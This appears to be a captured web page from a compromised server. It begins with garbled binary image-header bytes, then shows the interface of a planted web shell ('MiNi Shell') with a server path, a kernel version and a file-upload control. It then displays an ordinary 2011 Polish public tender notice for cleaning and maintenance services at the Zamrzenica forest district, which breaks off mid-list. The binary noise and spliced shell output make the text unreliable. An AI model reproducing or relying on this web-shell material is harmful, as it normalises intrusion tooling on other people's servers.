JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/320361-N-2011.html

<p class="kh_header"><b>Bysław: Usługi utrzymania czystości i obsługa administracyjna w Nadleśnictwie Zamrzenica</b><br>
<b>Numer ogłoszenia: 320361 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Zamrzenica , Zamrzenica 1A, 89-510 Bysław, woj. kujawsko-pomorskie, tel. 52 3341175, faks 52 3341173.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zamrzenica.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi utrzymania czystości i obsługa administracyjna w Nadleśnictwie Zamrzenica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług utrzymania czystości i wykonania prac porządkowych w biurze, na terenie posesji Nadleśnictwa Zamrzenica i kwaterze myśliwskiej w Zamrzenicy wraz z opalaniem kotłowni w siedzibie Nadleśnictwa Zamrzenica oraz usług transportowych i pozostałych prac gospodarczych na potrzeby Nadleśnictwa Zamrzenica.
2. Przedmiot zamówienia podzielony został na 4 części, które obejmują:
2.1 Część zamówienia 1: Usługi utrzymania czystości na terenie posesji wraz z opalaniem 
w kotłowni w siedzibie Nadleśnictwa Zamrzenica.
2.2 Część zamówienia 2: Usługi utrzymania czystości w biurze Nadleśnictwa Zamrzenica.
2.3 Część zamówienia 3: Usługi utrzymania czystości w kwaterze myśliwskiej w Zamrzenicy.
2.4 Część zamówienia 4: Usługi transportowe oraz pozostałe prace gospodarcze wykonywane na potrzeby Nadleśnictwa Zamrzenica.
3. Szczegółowy zakres i częstotliwość prac objętych zamówieniem (dla każdej z części zamówienia) zawiera załącznik nr 1 do SIWZ.
4. Wymagania dotyczące sposobu realizacji przedmiotu zamówienia: 
a) na terenie posesji (na zewnątrz biura) - wszelkie prace wykonywane przy użyciu głośnego sprzętu mechanicznego mogą być wykonywane jedynie przed lub po zakończeniu pracy biura, tj. przed 7:15 lub po 15:15;
b) sprzątanie pomieszczeń biurowca może być wykonywane po godzinach pracy biura, (7:15-15:15), za wyjątkiem sprzątania pomieszczeń, w których usługa w zakresie utrzymania czystości może być wykonywana jedynie w obecności użytkownika pomieszczenia; 
c) sprzątanie kwatery myśliwskiej jest uwarunkowane terminami pobytu gości 
w kwaterze, może wypaść również w sobotę, niedzielę lub święto, przy czym zamawiający będzie tego wymagał jedynie jeżeli czynność nie może być wykonana w dzień powszedni z przyczyn obiektywnych;
d) sprzęt i środki do sprzątania zapewnia wykonawca (zakupuje na własny koszt) za wyjątkiem środków chemicznych do odświeżania powietrza, worków na śmieci, papieru toaletowego, mydła do dystrybutorów oraz żarówek, które zapewni zamawiający;
e) Wykonawca gwarantuje, że materiały i środki czystości, które będą wykorzystywane do wykonania usług sprzątania są dopuszczone do stosowania zgodnie z przepisami prawa i będą stosowane zgodnie z przeznaczeniem i zaleceniami producenta;
f) środki używane do sprzątania powinny być wyłącznie wysokiej jakości, właściwe dla danego rodzaju nawierzchni, o delikatnym i przyjemnym zapachu (niedrażniące);
g) wykonawca zobowiązany jest do zachowania w tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem ww. usługi;
h) wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i p.poż. oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług oraz 
w skutek innych działań osób zatrudnionych przez wykonawcę;
i) w ramach usług transportowych wykonawca zobowiązany będzie m. in. do przewozu materiałów o wadze do 1 tony;
j) wymagana jest należyta staranność, sumienność i rzetelność przy realizacji przedmiotu zamówienia;
k) wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie z wszystkimi wymaganiami Zamawiającego wskazanymi w niniejszej SIWZ;
l) wykonawca odpowiada materialnie za powierzone przez zamawiającego materiały;
m) wykonawca wykonuje czynności będące przedmiotem zamówienia własnym sprzętem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4, 90.91.40.00-7, 77.31.00.00-6, 60.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku:
dla części nr 1 zamówienia
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje, co najmniej jedną usługę utrzymania terenów zieleni, trwającą co najmniej 6 miesięcy w ramach jednego kontraktu o wartości nie mniejszej niż 8 000,00 zł brutto (słownie: osiem tysięcy złotych) oraz co najmniej jedną usługę związaną z obsługą kotła c.o. (opalanie w okresie grzewczym) trwającą co najmniej 6 miesięcy w ramach jednego kontraktu, w obiektach użyteczności publicznej lub budynkach mieszkalnych wielorodzinnych o wartości nie mniejszej niż 6 000,00 zł brutto (słownie: sześć tysięcy złotych).

dla części nr 2 zamówienia
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje, co najmniej jedną usługę sprzątania odpowiadającą swoim rodzajem usługom sprzątania budynków o wartości co najmniej 20 000,00 zł brutto (słownie: dwadzieścia tysięcy złotych).
W stosunku do części nr 3 i 4 zamówienia Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części nr 1 zamówienia 
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej 1 osobą wyznaczoną do realizacji niniejszego zamówienia, która posiada wynikający z jednego kontraktu co najmniej 6-miesięczny staż pracy, polegający na utrzymaniu terenów zielonych (koszenie trawników, strzyżenie żywopłotów etc.) nabyty w ciągu ostatnich trzech lat przed upływem terminu składania ofert oraz co najmniej jedną osobą posiadającą uprawnienia do obsługi kotłów c.o. na paliwa stałe.
Uwaga: Zamawiający dopuszcza łączenie ww. warunków, jeżeli osoba przedstawiona w wykazie będzie spełniała oba warunki postawione przez Zamawiającego.

dla części nr 2 zamówienia 
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej 1 osobą wyznaczoną do realizacji niniejszego zamówienia, która posiada wynikający z jednego kontraktu co najmniej 6-miesięczny staż pracy, polegający na sprzątaniu w obiektach biurowych nabyty w ciągu ostatnich trzech lat przed upływem terminu składania ofert.

UWAGA: W przypadku składania ofert na więcej niż jedną część zamówienia osoby przedstawione przez Wykonawcę w wykazie osób mogą się powtarzać w innych częściach zamówienia, jeżeli łącznie spełniają postawione przez Zamawiającego warunki.

W stosunku do części zamówienia nr 3-4 Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument, z którego wynika upoważnienie wykonawcy do podpisania oferty lub pełnomocnictwo do reprezentowania wykonawcy, jeżeli ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_zamrzenica/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Zamrzenica, Zamrzenica 1A, 89-510 Bysław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 10:00, miejsce: Nadleśnictwo Zamrzenica, Zamrzenica 1A, 89-510 Bysław, sekretariat (pok. nr 20).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi utrzymania czystości na terenie posesji wraz z opalaniem w kotłowni w siedzibie Nadleśnictwa Zamrzenica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. UTRZYMANIE CZYSTOŚCI NA TERENIE POSESJI
1. Utrzymanie zieleni przy siedzibie Nadleśnictwa  w Zamrzenicy polegające na: koszeniu trawników przed i za biurowcem, w parku zadrzewień  boisku (teren plenerowy), wykaszaniu traw na placu magazynowym i placu garażowym przy leśniczówce Zamrza i poboczach drogi dojazdowej do siedziby l-ctwa i N-ctwa wraz z uprzątnięciem - 26000m2, w okresie od 1 maja do 31 października 2012-2014 - koszenie minimum 2 razy w miesiącu.
2. Utrzymanie zieleni przy siedzibie nadleśnictwa polegające na: przycinaniu żywopłotów z zachowaniem obecnego ozdobnego wyglądu przy biurowcu i w parku zadrzewień wraz z uprzątnięciem 786 mb, w okresie od 1 maja do 31 października 2012-2014 - przycinanie minimum 1 raz w miesiącu.
3. Pielęgnacja zieleni polegająca na podkrzesywaniu  gałęzi drzew, krzewów- 300 szt., oraz bieżące usuwanie chwastów z rabatów - 50m2 wraz z uprzątnięciem i podlewaniem krzewów rabatów według potrzeb wokół siedziby nadleśnictwa w okresie od 1 maja do 31 października 2012-2014.
4. Jesienne porządki polegające na: grabieniu, uprzątaniu na bieżąco wraz z wywozem spadających liści , gałęzi  z drzew w obrębie siedziby nadleśnictwa co najmniej 1 raz w tygodniu w latach 2012-2014.
5. Wiosenne porządki wokół siedziby biurowca Nadleśnictwa i placach magazynowych, polegających na uprzątnięciu resztek liści, gałęzi pozostałych po okresie zimowym w m-cu III-IV/ 2012-2014 wg dyspozycji działu administracji.
6. Inne prace zlecone wg potrzeb zamawiającego: czyszczenie odpływów, opadniętych gałęzi z drzew przy drodze dojazdowej do nadleśnictwa, odnowienie pasów- miejsc parkingowych przy biurowcu nadleśnictwa, zasilenie krzewów , drzew i zieleni przy siedzibie nadleśnictwa wraz z ochroną ich przed owadami i grzybami (opryski chemiczne) oraz zabezpieczenie przed mrozami krzewów.
II. OBSŁUGA HYDROFORNI 
1. Obsługa hydroforni w zakresie: płukanie urządzeń filtrujących co najmniej 1 raz w tygodniu do czerwca 2012r. wraz z stałym nadzorem nad zamontowanymi w niej urządzeniami (to jest stanem technicznym) i konserwacją.
2. W okresie zimowym ( 5 m-cy ) utrzymanie stanu dróg dojazdowych, chodników,     parkingów, schodów nadleśnictwa w stanie odśnieżonym, oraz usuwanie oblodzenia z tych powierzchni poprzez posypywanie piaskiem i jego sprzątnięcie po sezonie zimowym.
III. OPALANIE KOTŁOWNI W OKRESIE GRZEWCZYM
1. Opalanie kotłowni biurowca w okresie od 1 października do 31 kwietnia 2012-2014r. w dni robocze oraz w dniach wolnych od pracy i w święta w okresie temperatur ujemnych wraz z stałym nadzorem nad kotłownią w zakresie bhp, stanem technicznym pieców grzewczych, ich czystością (wywóz popiołu z procesów spalania do kontenera ustawionego przy biurowcu) w okresie grzewczym: I-IV , X-XII/2012-2014r. (7 m-cy)
2. Inne prace administracyjno - gospodarcze  zlecone wg potrzeb Zamawiającego - dysp. działu administracji.
IV.	PRZYGOTOWANIE OPAŁU DO OPALANIA BIUROWCA
1. Przygotowanie opału na potrzeby opalania biurowca nadleśnictwa w zakresie: pocięcie, łupanie, sprzątnięcie odpadów (kora, wióry) i ułożeniem pod wiatę w celu dosuszenia oraz sukcesywnym dowozem do kotłowni w ilości 150mp. 

V. INNE PRACE ZLECONE
1. Inne prace zlecone wg potrzeb zamawiającego: usuwanie drobnych usterek w pomieszczeniach biurowych, meblach i wyposażeniu - biurowiec nadleśnictwa.
2. Prace magazynowe polegające na załadunku i rozładunku materiałów magazynowych w nadleśnictwie wg potrzeb Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.91.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi utrzymania czystości w biurze Nadleśnictwa Zamrzenica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Usługi utrzymania czystości w biurze Nadleśnictwa Zamrzenica (odkurzanie i mycie podłóg - ok. 509 m2, odkurzanie i czyszczenie wykładzin dywanowych - 164 m2, czyszczenie i dezynfekcja urządzeń sanitarnych, pranie firan, mycie okien, opróżnianie koszy na śmieci itp.). 2. Sprzątanie pomieszczeń biurowca może być wykonywane po godzinach pracy biura, (7:15-15:15), za wyjątkiem sprzątania pomieszczeń, w których usługa w zakresie utrzymania czystości może być wykonywana jedynie w obecności użytkownika pomieszczenia...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi utrzymania czystości w kwaterze myśliwskiej w Zamrzenicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Usługi utrzymania czystości w kwaterze myśliwskiej w Zamrzenicy oraz wykonanie prac porządkowych wokół kwatery (odkurzanie i zmywanie podłóg - ok. 210 m2, odkurzanie i czyszczenie wykładzin dywanowych - ok. 20m2, czyszczenie i dezynfekcja urządzeń sanitarnych, mycie okien, pranie firan, pranie pościeli itp.).
2. Szczegółowy zakres i częstotliwość prac objętych zamówieniem zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi transportowe oraz pozostałe prace gospodarcze wykonywane na potrzeby Nadleśnictwa Zamrzenica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. USŁUGI TRANSPORTOWE
1. Przewóz materiałów (sadzonek, nasion, szyszek) oraz innego zaopatrzenia zakupionego przez Zamawiającego wg dysp. działu administracji - ładunki do 1 tony. 
2. Przewóz osób - adm. wg potrzeb Zamawiającego - max 8 osób.

II. UTRZYMANIE PRZEJEZDNOŚCI DROGI WEWNĘTRZNEJ ZAMRZENICA - SZUMIĄCA
1. Utrzymanie w stanie przejezdności w okresie zimowym wewnętrznej drogi administracyjnej na odcinku - 7 km , Szumiąca  - Zamrzenica polegające na posypywaniu piaskiem oblodzenia drogi asfaltowej  w/g dysp. działu administracji, za faktycznie wykonaną usługę za cały okres trwania umowy tj. 135 dni.
III. INNE PRACE ZLECONE
1. Inne prace załadunkowe i rozładunkowe w N-ctwie  wg potrzeb Zamawiającego - do dysp. działu administracji w latach 2012-2014.
2. Inne prace administracyjno- gospodarcze w N-ctwie  wg potrzeb Zamawiającego - dysp . działu administracji w latach 2012-2014.
IV. UDROŻNIANIE PRZYDOMOWYCH OCZYSZCZALNI BIOLOGICZNYCH
